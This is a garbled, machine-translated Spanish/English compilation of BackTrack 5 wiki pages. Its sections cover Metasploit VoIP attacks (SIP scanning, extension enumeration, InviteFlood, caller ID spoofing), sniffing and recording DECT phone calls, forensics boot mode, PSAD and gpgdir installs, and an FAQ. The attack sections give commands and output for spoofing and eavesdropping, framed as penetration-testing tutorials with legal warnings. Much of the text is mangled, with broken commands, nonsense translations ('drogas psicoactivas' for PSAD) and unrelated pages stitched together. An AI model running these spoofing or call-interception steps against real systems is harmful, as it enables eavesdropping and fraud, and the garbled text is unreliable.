INVITE sip:@127.0.0.1 SIP/2.0 A: <sip:192.168.1.104> Via: 192.168.1.104 SIP/2.0/UDP De: "Hacker Evil" Call-ID: 14810.0.1.45 CSeq: 1 INVITE Max-Forwards: 20 Contact: <sip:127.0.0.1>

Vamos a echar un vistazo a una herramienta que ya hemos discutido llamado Inviteflood que se puede

utilizar para enviar falsa invitar peticiones.


root@bt:/pentest/voip/inviteflood# ./inviteflood eth0 201 192.168.1.104 192.168.1.104 1 -a "Backtrack"

Attacking VoIP Using Metasploit


The Metasploit framework includes several auxiliaries and modules dedicated for VoIP exploitation. Usted puede encontrarlos mediante la funcin de bsqueda con palabras clave como "sip" o "VoIP". Let's Launch msfconsole and perform a search for available modules:
root @ bt: ~ # msfconsole msf > search sip

Metasploit VoIP Modules


Here's a complete list of the available modules for you reference: Auxiliaries scanner/sip/enumerator - SIP Username Enumerator (UDP) scanner/sip/enumerator_tcp - SIP Username Enumerator (TCP) scanner/sip/options - SIP Endpoint Scanner (UDP) scanner/sip/options_tcp - SIP Endpoint Scanner (TCP) voip/sip_invite_spoof - SIP Invite Spoof Exploits windows/sip/aim_triton_cseq - AIM Triton 1.0.4 CSeq Buffer Overflow windows/sip/sipxezphone_cseq - SIPfoundry sipXezPhone 0.35a CSeq Field Overflow windows/sip/sipxphone_cseq - SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow unix/webapp/trixbox_langchoice - Trixbox langChoice PHP Local File Inclusion

Scanning SIP Enabled Devices


Metasploit provides a sip scanner auxiliary which comes in two flavors TCP and UDP, we can use it to discover SIP enabled devices using the OPTION method: Let's see an example of the UDP version: scanner/sip/options auxiliary Auxiliary Options and Usage:
msf > use auxiliary/scanner/sip/options msf auxiliary(options) > show options Opciones del mdulo auxiliar (/ escner / sip / opciones): Name Current Setting Required Description ---- --------------- -------- ----------BATCHSIZE 256 yes The number of hosts to probe in each set CHOST no La direccin local del cliente CPORT 5060 no The local client port Rhosts s la meta rango de direcciones CIDR o identificador Rport 5060 yes El puerto de destino

Temas del 1 S El nmero de subprocesos simultneos A nadie no el nombre de usuario de destino para sondear en cada host msf auxiliary(options) > set RHOSTS 192.168.1.130/24 Rhosts => 192.168.1.130/24 msf auxiliary(options) > run [*] 192.168.1.20 200 agent='Grandstream HT-502 V1.2A 1.0.1.35' verbs='INVITE, ACK, OPTIONS, CANCEL, BYE, SUBSCRIBE, NOTIFY, INFO, REFER, UPDATE' [*] 192.168.1.21 200 agent='Grandstream HT-502 V1.2A 1.0.1.35' verbs='INVITE, ACK, OPTIONS, CANCEL, BYE, SUBSCRIBE, NOTIFY, INFO, REFER, UPDATE' [*] 192.168.1.22 200 agent='Grandstream HT-502 V1.2A 1.0.1.35' verbs='INVITE, ACK, OPTIONS, CANCEL, BYE, SUBSCRIBE, NOTIFY, INFO, REFER, UPDATE' [*] 192.168.1.92 200 agent='Grandstream HT-502 V1.2A 1.0.1.35' verbs='INVITE, ACK, OPTIONS, CANCEL, BYE, SUBSCRIBE, NOTIFY, INFO, REFER, UPDATE' [*] 192.168.1.140 200 agent='Grandstream HT-502 V1.2A 1.0.1.35' verbs='INVITE, ACK, OPTIONS, CANCEL, BYE, SUBSCRIBE, NOTIFY, INFO, REFER, UPDATE' [*] 192.168.1.130 200 server='Asterisk PBX 1.6.2.13' verbs='INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY, INFO' [*] Scanned 256 of 256 hosts (100% complete) [*] Auxiliary module execution completed

Enumerating SIP extensions / Usernames


The scanner/sip/enumerator auxiliary can be used to discover valid SIP accounts, it supports two methods of discovery: OPTIONS and REGISTER, it also comes in two flavors TCP and UDP. Auxiliary options:
msf > use scanner/sip/enumerator msf auxiliary(enumerator) > show options Opciones del mdulo auxiliar (/ escner / sip / enumerador): Name Current Setting Required Description ---- --------------- -------- ----------BATCHSIZE 256 yes The number of hosts to probe in each set CHOST no La direccin local del cliente CPORT 5060 no The local client port MAXEXT 9999 s Ending extensin MTODO DE REGISTRO s Mtodo de recuento de usar OPCIONES / REGISTER MINEXT 0 yes Starting extension PADLEN 4 s relleno Cero mxima longitud Rhosts s la meta rango de direcciones CIDR o identificador Rport 5060 yes El puerto de destino Temas del 1 S El nmero de subprocesos simultneos

Ejemplo de uso:
msf auxiliary(enumerator) > set RHOSTS 192.168.1.104 RHOSTS => 192.168.1.104 msf auxiliary(enumerator) > set MINEXT 100 MINEXT => 100 msf auxiliary(enumerator) > set MAXEXT 500 MAXEXT => 500 msf auxiliary(enumerator) > set PADLEN 3 PADLEN => 3 msf auxiliary(enumerator) > run [*] Found user: 200 <sip:200@192.168.1.104> [Auth] [*] Found user: 201 <sip:201@192.168.1.104> [Auth] [*] Found user: 202 <sip:202@192.168.1.104> [Auth] [*] Found user: 203 <sip:203@192.168.1.104> [Auth] [*] Found user: 204 <sip:204@192.168.1.104>

[Auth] [*] Found user: 300 <sip:300@192.168.1.104> [Auth] [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed

Spoofing Caller ID auxiliary


The voip/sip_invite_spoof auxiliary will create a fake SIP invite request making the targeted device ring and display fake caller id information. Auxiliary Options:
msf > use voip/sip_invite_spoof msf auxiliary(sip_invite_spoof) > show options Opciones del mdulo auxiliar (/ voip / sip_invite_spoof): Name Current Setting Required Description ---- --------------- -------- ----------El MSG Metasploit usted tiene s el identificador de llamadas falso para enviar Rhosts s la meta rango de direcciones CIDR o identificador Rport 5060 yes El puerto de destino SRCADDR 192.168.1.1 si la direccin SIP a la llamada falsa proviene de Temas del 1 S El nmero de subprocesos simultneos

Ejemplo de uso:
msf auxiliary(sip_invite_spoof) > set RHOSTS 192.168.1.104 Rhosts => 192.168.1.104 msf auxiliary(sip_invite_spoof) > run [*] Sending Fake SIP Invite to: 192.168.1.104 [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed

Exploiting VoIP systems


Metasploit incluye varios exploits para el software cliente SIP e incluso para la interfaz de administracin web Trixbox PBX. Although this is not a SIP specific vulnerability it is still related and can enable a full control by an attacker on a PBX.

Closing Words
I hope you've found this document informative, please keep in mind that Backtrack Linux provides many tools and features we haven't covered here. Take the time to browse the tools read the manuals and README's I am sure you'll find the right tool for the job. Feel free to discuss the tools and methods mentioned here in the Backtrack Linux Forums we would love to here your feedback ideas and experiences.

http://www.backtrack-linux.org/forums/

Sobre el autor
Shai rod (aka @NightRang3r) is a full time Pen Tester at Avnet Information Security & Risk Management in Israel; He holds the Offensive security OSCP and OSCE certifications (among others) and manages his blog at http://exploit.co.il

Referencias
http://en.wikipedia.org/wiki/Session_Initiation_Protocol http://tools.ietf.org/html/rfc3261 http://www.hackingvoip.com/

DECT Sniffing Dedected

Este artculo fue contribuido por 5M7X. URL: http://www.back-track.de/index.php?page=team # SMTX Twitter: ! http://twitter.com/ # / 5M7X Email: 5M7X@mail.ru BIG FAT HAIRY ADVERTENCIA: ES ILEGAL grabar conversaciones telefnicas en muchos pases. Para obtener una lista de las leyes de privacidad estatales en los EE.UU.,

Contenido
[hide] 1 Qu es DECT? 1.1 El pro ble ma ? 1.2 Pro bad o en 2 Instalacin dedected 2.1 Inst alac in del rep osit orio 2.2 Inst alac in des de el cd igo fue nte 3 Instale algunas herramient as adicionales 4 Cargue los controlador es 5 Escanear

Qu es DECT?
http://en.wikipedia.org/wiki/Digital_Enhanced_Cordless_Telecommunications

El problema?
La mayora de los vendedores no implementar el cifrado en sus dispositivos, de forma que uno puede olerlo con determinado hardware y software. En un post anterior sobre el tema, consulte: http://www.offensive-security.com/backtrack/sniffing-dectphones-the-details/

Probado en
BackTrack 5 KDE ltimo kernel 2.6.38 con x86 Original Dosch y Amand Tipo II PCMCIA Card SIEMENS C1 Telfonos DECT configurado en modo repetidor NOTA: Este es un programa experimental que no est muy apoyado activamente ms!

Instalacin dedected
Con el fin de obtener dedected instalado en BackTrack, usted tiene las siguientes opciones: 1. Utilice dedected de los BackTrack 5 repositorios. 2. Compilar por su cuenta si usted quiere experimentar.

Instalar desde repositorio


root @ bt: ~ # apt-get update root @ bt: ~ # apt-get install dedected

Instalacin desde el cdigo fuente


Esta etapa es opcional para aquellos que quieran construir las herramientas de cdigo fuente.
root @ bt: ~ # preparar-kernel-sources root @ bt: ~ # cd / usr / src / linux root @ bt: ~ # cp-rf include / genera / * include / linux / root @ bt: ~ # cd / pentest / telefona root @ bt: ~ # svn co https://dedected.org/svn/trunk dedected_svn root @ bt: ~ # cd dedected_svn / com-on-air_cs-linux / root @ bt: ~ # make && make-C herramientas

Instale algunas herramientas adicionales


root @ bt: ~ # apt-get-y install audacia

Cargue los controladores


root @ bt: ~ # cd / pentest / telefona / dedected / com-on-air_cs-linux root @ bt: ~ # make nodo

Si no ha introducido su Dosch y tipo Amand 2 o Tipo 3 o Voo: doo # PCMCIA tarjeta hgalo ahora! A continuacin, cargar el controlador:
root @ bt: ~ # make load

Analizar en busca de partes fijas aka fp (estaciones base DECT)


root @ bt: ~ # cd / pentest / telefona / dedected / com-on-air_cs-linux / tools root @ bt:. ~ # / dect_cli

Si necesita informacin sobre el tipo de uso "ayuda". Si usted vive en la cerradura de EE.UU. a los EE.UU. / DECT 6 banda a travs de la "banda" de comandos. Vamos a permitir someverbosity:
verbo

Y empezar a buscar las estaciones base:


fpscan

Despus de escanear 2-3 veces a travs de todos los canales de desactivar la verbosidad, y detener la exploracin:
verbo detener

No haga caso de los telfonos que no quieren oler (por ejemplo, sus vecinos!)
Iniciar un callscan
callscan

Ahora toma el telfono DECT y hacer una llamada de prueba y espere hasta que aparezca la llamada telefnica. Asimismo, es suficiente si usted acaba de obtener un tono de marcacin. Debera ver algo como
Llamada # # # encontrado nuevo 00 82 31 33 73 en el canal 7 RSSI 34 detener

El nombre de su estacin base si desea:


Nombre 00 82 31 33 73 stallowned

Volcar todos los telfonos se encuentran:


arrojar

No haga caso de todos los telfonos excepto el suyo a travs del siguiente comando! IMPORTANTE!
ignorar 01 30 95 13 37

Grabe la llamada telefnica


Comience automaticially registro de cada llamada telefnica que detecta:
AUTOREC

Ahora toma el telfono telefona DECT y hacer una Llamada prueba. Recomiendo llamar un "serivce tiempo diciendo" que se puede llegar a travs de un nmero de telfono normal. Usted debe obtener algo como esto:
# # # A partir AUTOREC # # # Parando DIP # # # A partir callscan # # # Intentando sincronizar en ab b0 00 82 29 # # # Tiene sincronizacin # # # Dumping dump_2011-06-11_21_37_37_RFPI_00_82_ab_b0_29.pcap # # # Parando DIP

Despus de colgar tu llamada telefnica al vertimiento debera detenerse:

Decodificar la llamada de la corriente de datos


Detenga el AUTOREC:
detener

Decodificar el audiostream de la basura cruda


root @ bt:. ~ # / decode.sh

Importe los arroyos en audacia y escuchar las llamadas


Comience audacia a travs de "alt + f2" y escriba "audacia" y pulse Enter. Importe las partes fijas y porttiles hte-parte de archivos wav / pentest / telefona / dedected / com-on-air_cs-linux / tools travs de Archivo -.> Importar -> Audio o simplemente "ctrl + shift + I". Importar los archivos que terminan en. Pcap_fp.ima.g721.wav y pcap_pp.ima.g721.wav.. Juega tu llamada telefnica con el botn de reproduccin:

Sugerencia: si slo se puede or el ruido del telfono parece utilizar algunos de codificacin / cifrado. Puede activar el modo de repetidor en su telfono por lo que deshabilita el cifrado y se puede probar si su configuracin est funcionando correctamente.

Limpiar / Recargar
Si tiene que volver a cargar los controladores

root @ bt: ~ # cd / pentest / telefona / dedected / com-on-air_cs-linux root @ bt: ~ # make recargar

Si ha terminado y desea limpiar:


root @ bt: ~ # cd / pentest / telefona / dedected / com-on-air_cs-linux root @ bt: ~ # make unload root @ bt: ~ # rm / dev / coa

Protocolo DECT
Si usted est interesado en ms detalles del protocolo, puede abrir el archivo pcap en Wireshark.:

Video: Sniffing telfonos DECT con BackTrack 5

Oler los telfonos DECT con BackTrack desde SMTX .

Forensics

Actualmente no hay texto en esta pgina. Puedes buscar este ttulo de pgina en otras pginas, o buscar en los registros relacionados .

Forensics Boot

Forensics Boot
Desde BackTrack 4 y ahora BackTrack 5 te habrs dado cuenta de que tiene un Forensics BackTrack BackTrack opcin pero qu es eso?

LiveCD y Forense

Durante mucho tiempo, ahora, Linux Live CD han sido muy tiles para fines de adquisicin forense en los casos en que, por una razn u otra no se puede utilizar un bloqueador de escritura de hardware. Cuando se configura no a las unidades de montaje automtico, y conocer un poco de la forma, un Linux Live CD puede ser un bloqueador de software de escritura maravilloso. Para un CD de Linux en vivo para ser considerado para este propsito, sin embargo, es de la mayor importancia que el uso de la CD en vivo no altera en cualquier datos de cualquier manera. Esa es la razn principal por la que BackTrack se puso en marcha en el pasado, BackTrack se montan automticamente los discos disponibles y utilizar las particiones de intercambio cuando estn disponibles, al hacer esto BackTrack pudo causar todo tipo de estragos, el cambio de los ltimos tiempos de montaje, la alteracin de datos en el disco, y as sucesivamente . Pero como BackTrack 4 y ahora BackTrack 5 que no es el caso ms. Cmo? Por lo tanto, vamos a tener la primicia. Personas forenses son a menudo detallista y muy conservador, as que cmo sabemos que es seguro de usar? Bueno, para empezar el BackTrack 5 CD en vivo se basa fuera de Casper, y no contiene secuencias de comandos del sistema de archivos de montaje automtico en absoluto. Los scripts de inicializacin del sistema se han modificado en el modo de arranque forense para que BackTrack 5 no buscar o hacer uso de cualquier particin de swap que figuran en el sistema. Todos estos scripts se han eliminado del sistema. Verificacin: Para probar esta funcionalidad, hemos probado esta modalidad de arranque con configuraciones de hardware. Para cada prueba, se tom una instantnea antes MD5 de los discos del sistema, arranca en modo de arranque BackTrack5 forense, verificado ningn sistema de archivos fueron montadas y swap no estaba en uso, hizo una serie de actividades en el sistema, a continuacin, apague el sistema hacia abajo y tom una instantnea despus de MD5. En la comparacin de las dos instantneas MD5, en cada caso eran un partido, lo que demuestra ningn cambio en los discos se ha hecho. Uso: Cuando se utilizan con fines forenses Backtrack, asegrese de que no se esperar a que un arranque sin supervisin. Arranque por defecto para Backtrack es el modo de arranque estndar, que utilizar las particiones swap si estn presentes. Hay un retraso agradable sin embargo, por lo que tendr un montn de tiempo para seleccionar el modo de arranque correcto. Tambin, por favor recuerde que esta es una distribucin de Linux. Es altamente recomendable que se familiarice con Linux antes de usar este o cualquier otro Live CD de Linux para propsitos forenses. Adems, asegrese de revisar las herramientas forenses adicionales aadidos a Backtrack 5. Nos hemos concentrado en la adicin de imgenes y herramientas de triage, pero si usted encuentra que uno de sus utilidades favoritas no est en su sitio, por favor hganoslo saber para que podamos mirar en tener agreg.

Instalar PSAD

URL: http://www.nanotechfibers.com/ Twitter: ! http://twitter.com/ # / rickflores_

Email: nanoquetz9l@nanotechfibers.com

PSAD: Deteccin de intrusiones y anlisis de registros con iptables


Qu est drogas psicoactivas? PSAD es una coleccin de tres demonios del sistema livianos (dos demonios principales y un demonio ayudante) que se ejecutan en mquinas Linux y analizar los mensajes de registro # iptables para detectar escaneos de puertos y el trfico sospechosa. Una implementacin tpica consiste en ejecutar las drogas psicoactivas en el firewall iptables donde # # tiene el acceso ms rpido a los datos de registro. Proceso de instalacin: Verificar md5sum, y la clave pblica:
root @ bt: ~ # cd / usr / local / src root @ bt: / usr / local / src # wget http://cipherdyne.org/psad/download/psad-2.1.7.tar.bz2 root @ bt: / usr / local / src # wget http://cipherdyne.org/psad/download/psad-2.1.7.tar.bz2.md5 root @ bt: / usr / local / src # wget http://cipherdyne.org / psad/download/psad-2.1.7.tar.bz2.asc root @ bt: / usr / local / src # wget http://cipherdyne.org/public_key root @ bt: / usr / local / src # md5sum - c PSAD-2.1.7.tar.bz2.md5 PSAD-2.1.7.tar.bz2: root @ bt Aceptar: / usr / local / src # gpg - import public_key root @ bt: / usr / local / src # gpg - verify PSAD-2.1.7.tar.bz2.asc # gpg: Firma hizo Mi 14 de julio 2010 06:01:06 PM EDT uso de claves DSA ID 0D3E7410 # gpg: Good signature de "Michael Rash (La firma de clave para cipherdyne . Proyectos ORG) <mbr@cipherdyne.org> "

Instale PSAD:
root @ bt: / usr / local / src # tar xfj PSAD-2.1.7.tar.bz2 root @ bt: / usr / local / src # cd PSAD-2.1.7 root @ bt:. / usr/local/src/psad-2.1.7 # / install.pl # Te gustara instalar las ltimas firmas de # http://www.cipherdyne.org/psad/signatures (y / n)? y

Comience PSAD: Tenga en cuenta que recibir el siguiente error:


root @ bt :/ usr/local/src/psad-2.1.7 # / etc / init.d / PSAD inicio PSAD inicio: [*] No se pudo encontrar electrnico, editar el archivo / etc / PSAD / psad.conf en / usr / sbin / lnea PSAD 9679.

Para solucionar este problema tendremos que editar psad.conf ubicado en / etc / PSAD / y agregar una direccin de correo electrnico de la siguiente manera:
root @ bt :/ usr/local/src/psad-2.1.7 # vim / etc / PSAD / psad.conf

Tambin puedes ver: Ms Referencias Autor Bio: Mis pasiones son la nanoingeniera, Ruby programacin, explotacin de software, explotar desarrollo, hacking hardware embebido. Tambin me gusta levantar pesas, natacin de combate, Ninjutsu, Parkour (funcionamiento libre), Krav Maga y MMA. I "creer" que puede convertirse en cualquier cosa que desee con la derecha disciplina mental tenacidad y acondicionamiento fsico.

Instalar GPGDir

URL: http://www.nanotechfibers.com/ Twitter: ! http://twitter.com/ # / rickflores_ Email: nanoquetz9l@nanotechfibers.com

gpgdir - Encriptacin directorio recursivo con GnuPG


Cul es gpgdir? gpgdir es un script de perl que utiliza el GnuPG CPAN :: Mdulo de interfaz para cifrar y descifrar los directorios mediante una clave gpg especificado en ~ /. gpgdirrc. Proceso de instalacin: Verifique que la llave pblica:
root @ bt: ~ # cd / usr / local / src / root @ bt: / usr / local / src # mkdir gpgdir root @ bt: / usr / local / src # cd gpgdir / root @ bt: / usr / local / src / gpgdir # wget http://cipherdyne.org/gpgdir/download/gpgdir1.9.5.tar.bz2 root @ bt: / usr / local / src / gpgdir # wget http://cipherdyne.org/gpgdir/download/gpgdir1.9.5.tar.bz2.asc root @ bt: / usr / local / src / gpgdir # wget http://cipherdyne.org/public_key root @ bt: / usr / local / src / gpgdir # gpg - import public_key root @ bt: / usr / local / src / gpgdir # gpg - verify-gpgdir 1.9.5.tar.bz2.asc

Instale gpgdir:
root @ bt: / usr / local / src / # tar gpgdir xfj gpgdir-1.9.5.tar.bz2 root @ bt: / usr / local / src / gpgdir # cd gpgdir-1.9.5 root @ bt:. / usr/local/src/gpgdir/gpgdir-1.9.5 # / install.pl

Editar el archivo de configuracin para utilizar la clave GnuPG por defecto:


root @ bt: vim / usr / local / src / gpgdir

Tambin puedes ver: Ms Referencias Autor Bio: Mis pasiones son la nanoingeniera, Ruby programacin, explotacin de software, explotar desarrollo, hacking hardware embebido. Tambin me gusta levantar pesas, natacin de combate, Ninjutsu, Parkour (funcionamiento libre), Krav Maga y MMA. I "creer" que puede convertirse en cualquier cosa que desee con la derecha disciplina mental tenacidad y acondicionamiento fsico.

UGS CONOCIDOS

Bugs conocidos en BackTrack


BackTrack 5 R1
Instalacin parece colgar en un 99%. Esto es un error cosmtico introducido por nosotros. Dale tiempo, sigue siendo copiado!. conductores rt2800usb son poco fiables. Algunas tarjetas de entrar en modo monitor, pero no muestran y capturan los datos. Si este es su caso, intente compilar los controladores personalizados de una rama compat-wireless. Para mosre

Preguntas ms frecuentes

Contenido
[hide] 1 BackTrack Preguntas frecuentes 2 Acabo de instalar BackTrack, cul es la contrasea de root? 3 Por qu mi parada teclado funciona cuando intento escribir la contrasea ? 4 Cmo iniciar el entorno grfico? BackTrack 5 Es libre para descargar? 6 Se ofrecen versiones de 64 bits o un gnomo de BackTrack ? 7 Qu versin debo descargar? 8 Yo acabo de quemar mi iso y no arranca? 9 Yo uso Windows y

BackTrack Preguntas frecuentes Acabo de instalar BackTrack, cul es la contrasea de root?


El instalador Ubiquity utiliza el nombre de usuario "root" y "Toor" password por defecto. Tambin recomendamos que cambie esto tan pronto como haya reiniciado y comprobado que todo funciona correctamente. Puede hacerlo emitiendo el siguiente comando y siguiendo las instrucciones.
passwd root

Por qu mi parada teclado funciona cuando intento escribir la contrasea?


No, el teclado sigue funcionando. Cuando escribe su contrasea en BackTrack, no se muestra nada en la pantalla. Esta es una medida de seguridad para evitar que alguien "hombro" y ser capaz de ver el tiempo que su contrasea es, lo que hace que sea ms difcil para alguien que usted sabe que adivinar la contrasea.

Cmo puedo iniciar el entorno grfico?


Despus de arrancar desde el DVD / USB o despus de entrar en una instalacin de disco duro, escriba el siguiente comando
startx

Es gratis para descargar BackTrack?


S, y siempre lo ser.

Ofrecen una versin de 64 bits o gnomo de BackTrack?


S, ahora ofrecen 64 bits y 32 bits ISO, as como el apoyo a los dispositivos basados en ARM mviles. Tanto la versin de 32 bits y 64 bits vienen con Gnome o KDE. Tambin puede utilizar Fluxbox como su WM.

Qu versin debo descargar?


Le recomendamos que descargue BackTrack 5. Ya no apoyar ninguna otra versin.

Acabo de quemar mis iso y no arranca?


Los tres problemas ms comunes son la suma md5 es incorrecto, el programa que utiliz para grabar el archivo. Iso o materiales baratos. Por favor revise estas tres cosas antes de pedir ayuda.

Yo uso Windows y no quiero meter la pata?


Backtrack se puede ejecutar como un entorno vivo dvd que no afectar a su instalacin de Windows en modo alguno. Si ejecuta el instalador y se instala en el disco duro que son los responsables de particionar su disco correctamente y seleccionar la unidad correcta o particin. Guas sobre los mtodos de instalacin se puede encontrar en la pgina de instalacin . Por favor, recuerde que las selecciones incorrectas completamente puede limpiar su disco duro y, potencialmente, se va sin su Windows / instalaciones originales de Linux! Considere esto como su nica advertencia!

He odo que es estpido que se ejecute como root?


Muchas de las herramientas de Backtrack necesite acceso de root para ejecutar. Backtrack es una distribucin de pruebas de penetracin especializada. Confiamos en que nuestros usuarios conozcan los riesgos de seguridad se ejecuta como el usuario root.

Cul es el "perfecto" laptop para correr marcha atrs en?


Cada versin de un perfecto es diferente. No hay equipo perfecto. Por favor, compruebe los foros donde los usuarios publican sus reflexiones sobre los modelos de computadoras. Por favor, recuerde que debe aadir la suya a la lista demasiado

Dnde est el manual de Backtrack?


No hay un manual. Tenemos escribir documentacin oficial sobre cmo instalar Backtrack y cmo utilizar algunas de las herramientas ms exticos, sin embargo, no escribir guas sobre piratera informtica en general. Tenemos un foro de la comunidad y una wiki que ambos contienen muchos usuarios y tutoriales Dev Team presentados. Por favor recuerde revisar el manual de la seccin de la pgina web para obtener ms informacin sobre la documentacin oficial.

Ofrecen algn tipo de formacin oficial?


Consulte nuestra ofensiva de Entrenamiento en Seguridad Web site para la Formacin BackTrack slo oficial.

Dnde puedo encontrar ms informacin sobre BackTrack?


Mantngase al da con nuestro blog , revise nuestros foros y comprobar BackTrack Fixes aqu.

Por qu no puedo yo aadir los repositorios de Backtrack para mi instalacin de Ubuntu o los repositorios de Ubuntu a mi instalacin Backtrack?
Le recomendamos encarecidamente en contra de esta accin porque las herramientas de Backtrack se construyen con muchas caractersticas personalizadas, bibliotecas y ncleo. No tenemos forma de saber cmo se llevar a cabo de manera no distribucin Backtrack, adems de que muy pronto romper su instalacin. Adems, si desea aadir los repositorios de Ubuntu a tu Backtrack instalacin, con toda seguridad, romper su instalacin Backtrack todo muy rpidamente. Hacemos un montn de pruebas para asegurar que todos los paquetes en nuestro repo trabajarn juntos sin causar problemas. Si te decides por este curso de accin que usted lo hace bajo su propio riesgo y el equipo de marcha atrs no ofrecer ningn apoyo de ninguna manera.

Quiero / necesidad de reconstruir el kernel, me puedes ayudar?


En primer lugar, es muy poco probable que realmente tienen la necesidad de hacer esto. En segundo lugar, si usted necesita ayuda para reconstruir el kernel, entonces probablemente no deberas estar hacindolo en primer lugar. Hacemos un montn de pruebas para asegurar que todos los paquetes en nuestro trabajo repo con el ncleo que la oferta y utilizando su propio ncleo no tenemos manera de saber lo que la compatibilidad se romper. Nosotros no apoyamos esto y no ofrecen ayuda para aquellos que optan por seguir adelante y reconstruir el kernel. Lo siento, pero si usted todava siente que quiere / necesita para reconstruir el kernel por cualquier razn, usted est por su cuenta. Nosotros no apoyamos esto y no ofrecen ninguna pregunta o respuesta de ayuda de aquellos que deciden seguir adelante y reconstruir el kernel.

Por qu mis tarjetas de red aparecen cuando arranco?


BackTrack es una distribucin de pruebas de penetracin y como tales peticiones DHCP, etc entra en la red durante el arranque suelen ser muy indeseable. Usted puede habilitar la red ejecutando el siguiente comando:
/ Etc / init.d / networking inicio

Por qu no puedo utilizar BackTrack tarjeta inalmbrica "X" dentro de VMWare o Virtualbox?
Cualquier software de virtualizacin slo puede utilizar las tarjetas de red inalmbrica USB como dispositivos fsicos, todos los otros tipos de tarjetas inalmbricas son vistos como dispositivos virtuales Ethernet y slo puede ser visto como un dispositivo inalmbrico por el anfitrin y no por el sistema operativo invitado. As que si usted desea ejecutar BackTrack en VMWare o Virtualbox y tienen todas las capacidades inalmbricas, asegrese de que est utilizando un dispositivo USB.

Por qu no ofrecer una imagen USB como lo hizo con las versiones anteriores?
Las versiones anteriores requieren a veces bastante complicado mtodos para instalar en una memoria USB, por lo que por conveniencia hemos proporcionado imgenes especiales para facilitar la instalacin. Con las ltimas ediciones de BackTrack hemos eliminado esa necesidad, ya que fcilmente se puede instalar en una memoria USB con herramientas como Unetbootin o mediante mtodos manuales que se describen en la instalacin de este sitio.

Cmo puedo contactar con usted?


A decir verdad, en la mayora de los casos que realmente no necesitan. En primer lugar considerar esto, cada uno de nosotros recibimos cientos de correos electrnicos y mensajes privados tanto en los foros y en nuestro canal de IRC cada da. Casi todos estos mensajes son de personas que hacen preguntas simples que estn bien cubiertos en este wiki, FAQ o en el foro mismo. Casi todos y cada uno de ellos es una cuestin que debe plantearse en el foro , ya que o bien se cubran, o la pregunta y su respuesta posterior sera de beneficio para toda la comunidad y no slo la persona que solicite la misma. Pinsalo de esta manera, si usted est haciendo esta pregunta, no tendra sentido que alguien ms puede tener la misma pregunta o Ya ha formulado. El foro y wiki son valiosas fuentes de informacin y que la informacin es slo tan buena como las preguntas formuladas y las respuestas. En segundo lugar, todo el equipo son voluntarios, ninguno de nosotros se les paga para trabajar en el proyecto y todos tenemos vidas, familia, trabajo, etc, fuera de BackTrack. Todos damos nuestro tiempo libre al proyecto y ms de lo que se recoge responder a estas preguntas es menos tiempo tenemos que trabajar en hacer BackTrack incluso mejor de lo que es. As que en resumen, si su pregunta no cae en la descripcin anterior, entonces es en su inters no enviar por correo electrnico o enviar un mensaje privado. Es muy probable que simplemente se ignora si se incluir en esta categora. Sin embargo, si hay algo no contemplado en el anterior, entonces por todos los medios se comunica con nosotros. Usted puede encontrar todos los el equipo de desarrollo en nuestro canal de IRC (recordar que no vivimos all todo el tiempo), en los foros o los datos de contacto en el Acerca pgina del sitio web .

Dnde est el canal de IRC que est hablando?


Si usted desea unirse a la comunidad y contribuir, vistenos en irc.freenode.net, en el canal # backtracklinux. Nuestra pgina web seguir siendo la fuente principal de todas las noticias y novedades sobre BackTrack. Asegrese de ver a nuestras reglas del canal leer el tpico del canal y recuerden que deben ser registrados para hablar. Importante: root (raz * * @ *) est prohibida por defecto en este canal, as que por favor asegrese de configurar su cliente de irc adecuadamente.

Soy nuevo en linux, es BackTrack un buen lugar para empezar?


Lo sentimos, la respuesta simple a esto es no. BackTrack es una distribucin altamente especializado, donde muchas de las tareas normales no se hace automticamente para usted, ya que estn en una distribucin de corriente. Nuestro mejor consejo, si usted desea comenzar usando linux con BackTrack como su primer sistema operativo Linux, es no. Comience por descargar una copia de Kubuntu (ya que es un sistema de base de operaciones similares a BackTrack) de arranque en esa y te obligas a hacer todo lo que est acostumbrado a hacer sobre una base diaria con que, preferiblemente pasar la mayor parte de su tiempo usando el comando herramientas de lnea. Cundo y slo cuando se pueden realizar todas las tareas diarias sin tener que buscar de seguridad de los ficheros debe mover a BackTrack. Por favor no tome esto como nosotros diciendo que no debera utilizar la Ruta inversa, tmelo como un consejo amistoso que te ests metiendo todo un mundo de dolor y frustracin si no est completamente cmodo realizando la administracin de su propia mquina linux antes comenzar con Backtrack.

Acabo de descargar e instalar la ltima versin de Backtrack, an necesito actualizar?


A pesar de que ha descargado la ltima versin de la ISO o VM, esto no significa que usted tendr los ltimos paquetes que ofrecemos. BackTrack es desarrollado y actualizado de manera continua, y por esta razn usted debe actualizar su instalacin de forma regular para mantenerse al da con los ltimos paquetes, correcciones de errores y nuevas herramientas.

Cundo y con qu frecuencia se actualiza el repositorio BackTrack con nuevos paquetes?


En general, el repo BackTrack se actualiza con los nuevos paquetes de fines de semana en un domingo por la noche para que estn disponibles para usted en la maana del lunes. Hay veces, sin embargo cuando nos parece que un paquete tiene que ser puesto en libertad de inmediato en lugar de esperar hasta el prximo Domingo programado repo actualizacin. As que en estos casos la

actualizacin del repositorio puede ocurrir en cualquier momento del da o de la noche durante la semana. Tenga en cuenta que si bien el repo se est sincronizado, no estar disponible para su descarga los paquetes. Este proceso no toma mucho tiempo, as que ser raro que esto cause alguno de vosotros tiene ms de un perodo muy corto de indisponibilidad.

Cmo puedo actualizar Backtrack con los nuevos paquetes?


Primero asegrese de que usted tiene una conexin a internet, a continuacin, utilice los siguientes comandos
root @ bt: ~ # apt-get update root @ bt: ~ # apt-get upgrade

Opcionalmente se puede ejecutar


root @ bt: ~ # apt-get update root @ bt: ~ # apt-get dist-upgrade

Dnde puedo encontrar una lista completa de todas las herramientas instaladas en BackTrack?
No existe tal recurso, sin embargo usted puede ver una lista de todos los paquetes instalados en el sistema BackTrack ejecutando:
dpkg - list

Por favor recuerde que esto mostrar todos los paquetes instalados en BackTrack y no slo las herramientas Tambin puede buscar en el repositorio para un paquete particular de inters, ejecute el comando siguiente:
apt-cache search <keyword de interest>

Вам также может понравиться